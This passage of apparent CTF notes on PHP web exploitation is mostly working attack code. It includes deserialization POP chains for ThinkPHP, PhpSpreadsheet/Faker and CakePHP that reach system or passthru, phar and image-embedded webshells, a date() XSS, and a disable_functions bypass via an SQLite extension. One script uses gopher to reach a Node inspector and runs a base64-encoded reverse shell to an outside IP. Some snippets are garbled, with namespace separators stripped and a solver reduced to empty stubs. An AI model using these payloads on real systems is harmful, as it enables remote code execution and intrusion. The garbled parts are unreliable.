"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda".
"\x00\x08\x01\x02\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x10\x1f\xff\xd9";
$phar = new Phar('payload.phar');
$phar->startBuffering();
$phar->addFromString('poll_result.skin.php', '<?php system("cat /f*"); ?>');
$phar->setStub($jpeg_header_size."\n<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();"""
f.write(payload.encode())
os.system("php --define phar.readonly=0 payload.php")
if __name__ == "__main__":
api = API()
res = api.config("../../bbs/skin/poll/")
print(res.text)
res = api.upload(("payload.png", open("payload.phar", "rb").read()))
filePath = res.json()["filePath"].split("/../")[-1]
res = api.poll_result("../../../"+filePath)
print(res.text)
PHP Deserialization Trick Using Call
so if the method not found inside a class the __call will be invoked
example challenge:
8TH XCTF Finals
Solver
<?php
namespace think\route {
class ResourceRegister
{
public $resource;
public function __construct($resource)
{
$this->resource = $resource;
}
}
abstract class Rule
{
public $rest = ['key' => [1 => '<id>']];
public $name = "name";
public $rule;
public $router;
public $option;
public function __construct($rule, $router, $option)
{
$this->rule = $rule;
$this->router = $router;
$this->option = ['var' => ['nivia' => $option]];
}
}
class RuleGroup extends Rule
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
class Resource extends RuleGroup
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
}
namespace think {
class Route
{
}
abstract class Model
{
private $relation;
protected $append = ['Nivia' => "1.2"];
protected $visible;
public function __construct($visible, $call)
{
$this->visible = [1 => $visible];
$this->relation = ['1' => $call];
}
}
class Validate
{
protected $type;
public function __construct()
{
$this->type = ['visible' => "system"];//function
}
}
}
namespace think\model {
use think\Model;
class Pivot extends Model
{
public function __construct($visible, $call)
{
parent::__construct($visible, $call);
}
}
}
namespace Symfony\Component\VarDumper\Caster {
use Symfony\Component\VarDumper\Cloner\Stub;
class ConstStub extends Stub
{
}
}
namespace Symfony\Component\VarDumper\Cloner {
class Stub
{
public $value = "google-chrome"; //cmd
}
}
namespace {
$call = new think\Validate;
$option = new think\model\Pivot(new Symfony\Component\VarDumper\Caster\ConstStub, $call);
$router = new think\Route;
$resource = new think\route\Resource("abc.nivia", $router, $option);
$resourceRegister = new think\route\ResourceRegister($resource);
echo base64_encode(serialize($resourceRegister));
}
without syhmfony to string
<?php
namespace think\route {
class ResourceRegister
{
public $resource;
public function __construct($resource)
{
$this->resource = $resource;
}
}
abstract class Rule
{
public $rest = ['key' => [1 => '<id>']];
public $name = "name";
public $rule;
public $router;
public $option;
public function __construct($rule, $router, $option)
{
$this->rule = $rule;
$this->router = $router;
$this->option = ['var' => ['nivia' => $option]];
}
}
class RuleGroup extends Rule
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
class Resource extends RuleGroup
{
public function __construct($rule, $router, $option)
{
parent::__construct($rule, $router, $option);
}
}
}
namespace think {
class Route
{
}
abstract class Model
{
private $relation;
protected $append = ['Nivia' => "1.2"];
protected $visible;
public function __construct($visible, $call)
{
$this->visible = [1 => $visible];
$this->relation = ['1' => $call];
}
}
class Validate
{
protected $type;
public function __construct()
{
$this->type = ['visible' => "system"];//function
}
}
}
namespace think\model {
use think\Model;
class Pivot extends Model
{
public function __construct($visible, $call)
{
parent::__construct($visible, $call);
}
}
}
namespace {
$call = new think\Validate;
$option = new think\model\Pivot(new Error("\ngoogle-chrome\n"), $call);
$router = new think\Route;
$resource = new think\route\Resource("abc.nivia", $router, $option); //trigger to string in Pivot
$resourceRegister = new think\route\ResourceRegister($resource);
echo base64_encode(serialize($resourceRegister));
}
Kurang lebih exploitasinya disimplified menjadi seperti ini
<?php
namespace will\you\call\me {
class CallMe
{
private function pleaseCallMe($val, $key)
{
return call_user_func($val, $key);
}
public function __call($method, $args)
{
return call_user_func_array($method, $args);
}
}
}
namespace iam\noone {
class Noone
{
public function nobody($cash)
{
echo "thanks for your cash $cash";
}
}
}
namespace world\will\call\me {
use iam\noone\Noone;
class StrongestSorcerer
{
private Noone $callMe;
private $cash = 0;
public function __tostring()
{
if (isset($this->callMe)) {
if (is_string($this->callMe)) {
} else {
$this->callMe->nobody($this->cash);
}
}
return "World strongest sorcerer";
}
}
}
namespace because\iam\strong\after\all {
abstract class DomainExpansion
{
protected $domain;
protected $juliet;
}
}
namespace idwin\really\idwillwin {
use because\iam\strong\after\all\DomainExpansion;
class Stringify extends DomainExpansion
{
public $romeo;
private function IamString($s)
{
if ($this->juliet == $this->romeo){
return "$s";
}
}
public function __destruct()
{
$this->romeo = random_bytes(100);
$this->IamString($this->domain);
}
}
}
namespace {
if (isset($_GET['ops']) && isset($_REQUEST['ops'])) {
if ($_GET['ops'] != $_REQUEST['ops']) {
unserialize($_REQUEST['ops']);
}
}
highlight_file(__FILE__);
}
Date function xss
date('<\i\m\g \s\r\c=\x \o\n\e\r\r\o\r=\a\l\e\r\t(1)>');
PHP file execution throught cve and send WebSocket using gopher
8TH XCTF Final
PHP Development Server <= 7.4.21 - Remote Source Disclosure (projectdiscovery.io)
import bitstruct
import requests
import json
base = 'http://172.22.177.166:64000'
proxy = f'{base}/proxy_v2.dev.php'
def get_id():
data = {'uri': 'http://127.0.0.1:9229/json'}
r = requests.post(proxy, data=data)
return r.json()[0]['id']
def get_mtu():
data = {'uri': 'file:///sys/class/net/lo/mtu'}
r = requests.post(proxy, data=data)
return int(r.text)
def read(uri):
data = {'uri': uri}
r = requests.post(proxy, data=data)
return r.text
def make_req(_req):
return ('\r\n'.join(_req) + '\r\n\r\n').encode()
def enc(data):
r = ''
for i in data:
r += '%' + hex(i)[2:].zfill(2)
return r
def make_gopher(ip, port, data):
assert b'\x00' not in data
return f'gopher://{ip}:{port}/_{enc(data)}'
def make_websocket_text_frame(data):
assert 126 <= len(data) < 2 ** 16
pkt = bytearray()
FIN, RSV, OPCODE, MASK, PAYLOAD_LEN = 1, 0, 1, 1, 126
EXTENDED_PAYLOAD_LEN = len(data)
MASK_KEY = b'\xfe\xfe\xfe\xfe'
MASKED_DATA = bytearray(data)
for i in range(len(MASKED_DATA)):
MASKED_DATA[i] = MASKED_DATA[i] ^ MASK_KEY[i % 4]
pkt += bitstruct.pack('>u1u3u4u1u7u16r32', FIN, RSV, OPCODE, MASK,
PAYLOAD_LEN, EXTENDED_PAYLOAD_LEN, MASK_KEY)
pkt += MASKED_DATA
return pkt
_id = get_id()
mtu = get_mtu()
req = make_req([
f'GET /{_id} HTTP/1.1',
'Sec-WebSocket-Version: 13',
'Sec-WebSocket-Key: NMtM5Mt1C7TYIF3JMw9G8w==',
'Connection: Upgrade',
'Upgrade: websocket',
'Content-Length: 0',
'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits',
'Host: 127.0.0.1:9229'
])
empty_text_frame = bytes.fromhex('818081808180')
padding_len = 0x50
cmd = 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAwLjIwMi4yMTYvNjUwMDEgMD4mMQ== | base64 -d | bash'
express = f'require("child_process").execSync("{cmd}");//{"A" * padding_len}'
exp = {
"id": 1,
"method": "Runtime.evaluate",
"params": {
"expression": express,
"includeCommandLineAPI": True
}
}
exp_text_frame = make_websocket_text_frame(json.dumps(exp).encode())
payload = req + b'A' * (mtu - len(req)) + exp_text_frame
print(read(make_gopher('127.0.0.1', 9229, payload)))
Misconfiguration like this can lead to arbitary php file include
tested in
FROM php:7.4-apache
RUN a2enmod rewrite
COPY ./src/default.conf /etc/apache2/sites-available/000-default.conf
COPY ./src/ /var/www/html/
<VirtualHost *:80>
<Directory />
Require all granted
</Directory>
ServerAdmin webmaster@localhost
LogLevel alert rewrite:trace3
DocumentRoot /var/www/html/
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
RewriteEngine On
RewriteRule ^/(.*)/$ /$1.html
</VirtualHost>
poc
http://localhost/usr/local/lib/php/peclcmd.php%3f/
reference from SCTF 2024 By W&M - W&M Team (wm-team.cn) chall havefun
Deserialization + File upload if FileCookieJar exist
https://blog.wm-team.cn/index.php/archives/82/#Simpleshop
require __DIR__ . '/vendor/autoload.php';use GuzzleHttp\Cookie\FileCookieJar;use GuzzleHttp\Cookie\SetCookie;$obj = new FileCookieJar('public/shell.php');$payload = '<?php eval(filter_input(INPUT_POST,a)); ?>';$obj->setCookie(new SetCookie([ 'Name' => 'foo',"Value"=>"1", 'Domain' => $payload, "a"=> 'bar', 'Expires' => time()]));$phar = new \Phar("1.phar");$phar->startBuffering();$phar->setStub('GIF89a'."__HALT_COMPILER();");$phar->setMetadata($obj);$phar->addFromString("test.txt", "test");$phar->stopBuffering();?>
XSS in 302 redirect
Forcing Firefox to Execute XSS Payloads during 302 Redirects | Gremwell
Some Faker __call chain
my writeup Exploitation
other
PHP POP Chain
o-o.ee/Patchstack-Alliance-CTF-S01E01/#h.otluyykmfb7g
Our entrypoint is in \PhpOffice\PhpSpreadsheet\Collection\Cells class
public function __destruct(){
$this->cache->deleteMultiple($this->getAllCacheKeys());
}
That might allow us controlling an arbitrary middle object, but alas, this is not the case this time.
Next we have the getAllCacheKeys() method call, that
private function getAllCacheKeys(){
$keys = [];
foreach ($this->index as $coordinate => $value) {
$keys[] = $this->cachePrefix . $coordinate;
}
return implode(',', $keys);
}
Allows us getting a __toString() call on the $this->cachePrefix object
Setting the cachePrefix to \PhpOffice\PhpSpreadsheet\Comment instance
public function __toString(): string {
return $this->text->getPlainText();
}
This allows us another call (now looking at it, this might have been maybe possible already on the previous step… oh-well, not going back to test now 😁)
Anyway, setting the text parameter to \Faker\ValidGenerator, we reach this super cool (and from defender's perspective super dangerous) function, that triggers, whenever the object is missing the method to handle the call.
Luckily, the ValidGenerator doesn't implement a function getPlainText, so we're good.
public function __call($name, $arguments){
$i = 0;
do {
$res = call_user_func_array([$this->generator, $name], $arguments);
++$i;
if ($i > $this->maxRetries) {
throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
}
} while (!call_user_func($this->validator, $res));
return $res;
}
Next we need to somehow control the function and argument, which we can do if we set the generator and validator
We can achieve our code execution via the
(!call_user_func($this->validator, $res));
Because the validator parameter we can control. Next we need few more things. We need to reach the block without throwing an error, which means that something needs to receive the getPlainText call and answer without failing. Bypassing the maxRetries is trivial, since we control the parameter. Further, since the validator gets the same $res parameter as the argument, we need to also control the output of
call_user_func_array([$this->generator, 'getPlainText']
Luckily, the Faker has another trick in our favour -> \Faker\DefaultGenerator that has
public function __call($method, $attributes)
{
return $this->default;
}
I have discovered, that is useful to have the "Faked" classes and "Original" classes side-by-side. Given that the serialized output is a string, I can simply do some string replacements to be able to target the original classes (obviously I cannot use Maker and ShpOffice anywhere else in the payload) 🤷
This is
<?php
namespace Maker {
class DefaultGenerator {
private $default;
function __construct() {
$this->default = 'cat /*.txt'; // Argument
}
}
class ValidGenerator {
private $generator;
private $validator;
private $formatters;
private $maxRetries;
function __construct() {
$this->generator = new \Maker\DefaultGenerator();
$this->validator = 'passthru'; // Function
$this->maxRetries = 2;
}
}
}
namespace ShpOffice\PhpSpreadsheet\Collection\Memory {
class SimpleCache3 {
}
}
namespace ShpOffice\PhpSpreadsheet\Worksheet\Worksheet{
class Worksheet{
private $parent;
function __construct() {
}
}
}
namespace ShpOffice\PhpSpreadsheet {
class Comment {
public $text;
function __construct() {
$this->text = new \Maker\ValidGenerator();;
}
}
}
namespace ShpOffice\PhpSpreadsheet\Collection{
class Cells{
private $parent;
private $cache;
private $index;
private $cachePrefix;
function __construct() {
$this->parent = new \ShpOffice\PhpSpreadsheet\Worksheet\Worksheet\Worksheet();
$this->cache = new \ShpOffice\PhpSpreadsheet\Collection\Memory\SimpleCache3();
$this->cachePrefix = new \ShpOffice\PhpSpreadsheet\Comment();
$this->index = [
'a' => 'b'
];
}
}
}
namespace {
echo "POP chain\n\n";
$part = new \ShpOffice\PhpSpreadsheet\Collection\Cells();
$serialized = (serialize($part));
$serialized = str_replace('Maker', 'Faker', $serialized);
$serialized = str_replace('ShpOffice', 'PhpOffice', $serialized);
echo urlencode($serialized);
// unserialize($serialized);
die("\n\nEND");
author
I wonder if you have found the itended chain for the donor challenge yet? And here is my solution
import re
session = requests.session()
def get_cookies(url):
def find_flag_filename(cookies,url):
def get_flag_content(cookies, flag_filename,url):
def main():
if name == "main":
Of course, it needs to be changed a bit to match the pachstack team's flag structure
<@663394727688798231> <@658787334984171539>
# PHP request smugling
<file src="file://%7B%22source%22%3A%22https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F39d1be85-e7c6-4263-a666-a42da95a70df%2F623fe104-d76b-498f-b947-72dcd447fb71%2Fphpnotes-ec604b5d03f9d522_(1).tar.xz%22%2C%22permissionRecord%22%3A%7B%22table%22%3A%22block%22%2C%22id%22%3A%2219548583-e65d-80c0-b834-eab16e581516%22%2C%22spaceId%22%3A%2239d1be85-e7c6-4263-a666-a42da95a70df%22%7D%7D"></file>
from here: [phpnotes \| hxp 38C3 CTF](https://2024.ctf.link/internal/challenge/b98bbcec-faad-40a0-8efa-e2998039d5be/)
[phpnotes - hxp 38C3 CTF Web Challenge Writeup \| siunam’s Website](https://siunam321.github.io/ctf/hxp-38C3-CTF/Web/phpnotes/)
<empty-block/>
Instead, we (ab)use the fact that the storage backend uses `werkzeug.util.secure_filename` to derive a “secure” filename for the note (without slashes or path traversal, etc.) — but that performs NFKD unicode normalization of the input first, so lots of Unicode characters get converted to normal printable ASCII. You can find normalization tables [here](https://www.unicode.org/charts/normalization/). For example, `ᶠₗₐℊ` (`\u1da0\u2097\u2090\u210a`) will be normalized to `flag`.
<empty-block/>
# PHP_ICO [https://github.com/chrisbliss18/php-ico](https://github.com/chrisbliss18/php-ico) / bypass imagecreatefromstring
You can upload file container special crafted png and then it will be saved in the server with your payload in plain text
PHP_ICO Exploit Note: Bypassing imagecreatefromstring
Source: chrisbliss18/php-ico
Summary
You can upload a specially crafted PNG file that embeds your payload as plain text.
The server will save the file with your payload intact, allowing for potential exploitation.
Proof of Concept
import httpx
import asyncio
import numpy as np
import cv2
# Base URL of the target application
URL = "<http://localhost:8080>"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.AsyncClient(base_url=url)
class API(BaseAPI):
async def convert_png_to_ico(self, file) -> httpx.Response:
return await self.c.post("/", files={"file": file})
def generate_image_from_bits(bits: str, size: tuple, output_file: str):
"""
Generate an RGBA image from binary bits and save it to a file.
:param bits: Binary data to encode into the image.
:param size: Tuple specifying the image dimensions (width, height).
:param output_file: Path to save the output PNG file.
"""
# Create an empty image array with RGBA channels
im = np.zeros((*size, 4), np.uint8)
for ind, i in enumerate(bits):
x = ind % size[0]
y = size[1] - 1 - (ind // size[0]) # Flip vertically to match OpenCV's top-left origin
im[y][x] = [255, 255, 255, (1 - int(i)) * 255]
# Fill remaining pixels (if any) with white and full opacity
for ind in range(len(bits), size[0] * size[1]):
x = ind % size[0]
y = size[1] - 1 - (ind // size[0])
im[y][x] = [255, 255, 255, 255]
# Save the image to disk
cv2.imwrite(output_file, im)
print(f"Image saved to {output_file}")
async def main():
"""Main function to generate and upload a payload as a PNG file."""
# Generate payload and convert to bits
payload = b"<?php system($_GET['c'])?>"
bits = ''.join([bin(i)[2:].zfill(8) for i in payload])
print(bits)
print(len(bits))
# Image size
size = (32, 32)
# Generate the image from bits
output_file = "result.png"
generate_image_from_bits(bits, size, output_file)
# Send the generated image to the server
api = API()
response = await api.convert_png_to_ico((".php", open(output_file, "rb"), "image/png"))
print(response.text)
if __name__ == "__main__":
asyncio.run(main())
POP gadget in CakePHP 5.1.4
Reference: SUCTF-2025 / web / SU_POP / writeup
<?php
namespace ReactPromiseInternal {
class RejectedPromise
{
private $reason = "x";
/** @var bool */
private $handled = false;
public function __construct($reason)
{
$this->reason = $reason;
}
}
}
namespace CakeTestSuiteConstraintResponse {
class HeaderEquals
{
protected string $headerName;
}
}
namespace Twig {
class ExtensionSet
{
private $initialized = true;
private $parserCallbacks = ["system"];
}
}
namespace CakeORM {
class Table
{
protected BehaviorRegistry $_behaviors;
public function __construct()
{
$this->_behaviors = new CakeORMBehaviorRegistry();
}
public function initTable1()
{
$cache = new ComposerCache();
$table2 = new CakeORMTable();
$extSet = new TwigExtensionSet();
$table2->_behaviors->setLoaded(
[
"emptydirectory" => $extSet,
"x" => $extSet,
"lol" => new ReactPromiseInternalRejectedPromise("lol")
],
["emptydirectory" => ["x", "getTokenParser"]]
);
$cache->setFilesystem($table2);
$this->_behaviors->setLoaded(
[
"name" => $cache,
"x" => $cache,
// "table" => new ReactPromiseInternalRejectedPromise("lol")
],
["name" => ["x", "clear"]]
);
}
}
class BehaviorRegistry
{
protected array $_methodMap;
protected array $_loaded;
/*
public function __construct()
{
$this->_loaded = [
"name" => new ComposerCache(),
"x" => new ComposerCache(),
// "table" => new ReactPromiseInternalRejectedPromise("lol")
];
}
*/
public function setLoaded($loaded, $_methodMap)
{
$this->_loaded = $loaded;
$this->_methodMap = $_methodMap;
}
}
}
namespace CakeCacheEngine {
class RedisEngine
{
protected $_Redis;
public function __construct()
{
$this->_Redis = new CakeORMTable();
}
}
}
namespace CakeDatabaseLog {
class LoggedQuery
{
}
}
namespace CakeView {
class Cell
{
}
}
namespace CakeHttpClient {
class FormData
{
protected array $_parts = [];
public function __construct()
{
$this->_parts = [new CakeORMTable()];
$this->_parts[0]->initTable1();
}
}
}
namespace CakeCollectionIterator {
class ReplaceIterator
{
protected $_callback = "system";
protected Traversable $_innerIterator;
public function __construct()
{
$this->_innerIterator = new ArrayIterator(["abcd"]);
}
}
}
/*
ReactPromiseInternalRejectedPromise => __destruct => tostring
CakeHttpClientFormData => toString
*/
namespace Composer {
/*
public function exists(): bool
{
return $this->getAdapter()->hasTable($this->getName());
}
*/
class Cache
{
private $enabled = true;
private $root = "find /flag.txt -exec cat {} \\;";
private $filesystem;
public function __construct()
{
// $this->filesystem = new CakeORMTable();
}
public function setFilesystem($filesystem)
{
$this->filesystem = $filesystem;
}
}
}
namespace {
// $o = new CakeCacheEngineRedisEngine();
$e = new CakeDatabaseLogLoggedQuery();
$e = new CakeViewCell();
$e = new CakeHttpClientFormData();
$o = new ReactPromiseInternalRejectedPromise($e);
file_put_contents("ser", serialize($o));
}
?>
Usage note:
/ser/?ser=base64encoded
Related reference: CakePHP 反序列化 POP 链挖掘 - 先知社区
yeah ill just drop the relevant snippets
Relevant snippets
public function __destruct()
{
if ($this->handled) {
return;
}
$handler = set_rejection_handler(null);
if ($handler === null) {
$message = 'Unhandled promise rejection with ' . $this->reason;
$this->reason is untyped so we can use any object here
public function __toString(): string
{
if ($this->isMultipart()) {
$boundary = $this->boundary();
$out = '';
foreach ($this->_parts as $part) {
$out .= "--{$boundary}\\r\\n";
$out .= (string)$part;
$out .= "\\r\\n";
}
$out .= "--{$boundary}--\\r\\n";
return $out;
}
$data = [];
foreach ($this->_parts as $part) {
$data[$part->name()] = $part->value();
$this->_partscan be set to anything, so we will use$part->name()to trigger__call__ofORM\\Table.php
public function call(string $method, array $args = []): mixed
{
$method = strtolower($method);
if ($this->hasMethod($method) && $this->has($this->_methodMap[$method][0])) {
[$behavior, $callMethod] = $this->_methodMap[$method];
return $this->_loaded[$behavior]->{$callMethod}(...$args);
}
We can set_methodMapand_loadedsuch that we have full control over$this->_loaded[$behavior]->{$callMethod}, but not$args.
public function clear()
{
if ($this->isEnabled() && !$this->readOnly) {
$this->filesystem->emptyDirectory($this->root);
return true;
}
return false;
}
Kawaii PHP Jail
| Event Name | - |
| Source URL | - |
| Challenge Name | Kawaii PHP Jail |
Attachments
solve.pyReferences
eval(isset($_GET['cmd']) ? $_GET['cmd'] : '') gives direct attacker-controlled PHP execution.file_put_contents() available, allows writes under /tmp, and does not block SQLite extension loading through PDO./tmp/libhello_fd.so, decode it server-side, create new Pdo\Sqlite('sqlite::memory:'), call $db->loadExtension('/tmp/libhello_fd.so'), then execute SELECT exec_cmd('cat /flag.txt') via a function exported by the extension.http://localhost:12345/; the solver successfully loaded the extension and read /flag.txt.why it is vulnerable
// src/index.php
echo eval(isset($_GET['cmd']) ? $_GET['cmd'] : '');
// php.ini
disable_functions = exec,shell_exec,system,passthru,...,dl,...
open_basedir = /var/www/html:/tmp
exploit payload
$db = new Pdo\Sqlite('sqlite::memory:');
$db->loadExtension('/tmp/libhello_fd.so');
echo $db->query("SELECT exec_cmd('cat /flag.txt')")->fetchColumn();
solver
#include <stdio.h>
#include <string.h>
#include <sqlite3ext.h>
SQLITE_EXTENSION_INIT1
static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
const char *command = (const char*)sqlite3_value_text(argv[0]);
FILE *fp = popen(command, "r");
char buffer[4096], output[8192] = "";
while (fp && fgets(buffer, sizeof(buffer), fp)) {
strncat(output, buffer, sizeof(output) - strlen(output) - 1);
}
if (fp) pclose(fp);
sqlite3_result_text(context, output, -1, SQLITE_TRANSIENT);
}
int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
SQLITE_EXTENSION_INIT2(pApi);
sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
return SQLITE_OK;
}
import asyncio
import base64
import httpx
URL = "http://localhost:12345/"
SO_B64 = base64.b64encode(open("libhello_fd.so", "rb").read()).decode()
async def php(code):
async with httpx.AsyncClient(base_url=URL, timeout=30) as c:
r = await c.get("/", params={"cmd": code})
return r.text
async def main():
for i in range(0, len(SO_B64), 4000):
chunk = SO_B64[i:i+4000]
mode = "" if i == 0 else ",FILE_APPEND"
await php(f"file_put_contents('/tmp/libhello_fd.so.b64','{chunk}'{mode});")
await php("file_put_contents('/tmp/libhello_fd.so', base64_decode(file_get_contents('/tmp/libhello_fd.so.b64')));")
print(await php("$db = new Pdo\\Sqlite('sqlite::memory:'); $db->loadExtension('/tmp/libhello_fd.so'); echo $db->query(\"SELECT exec_cmd('cat /flag.txt')\")->fetchColumn();"))
asyncio.run(main())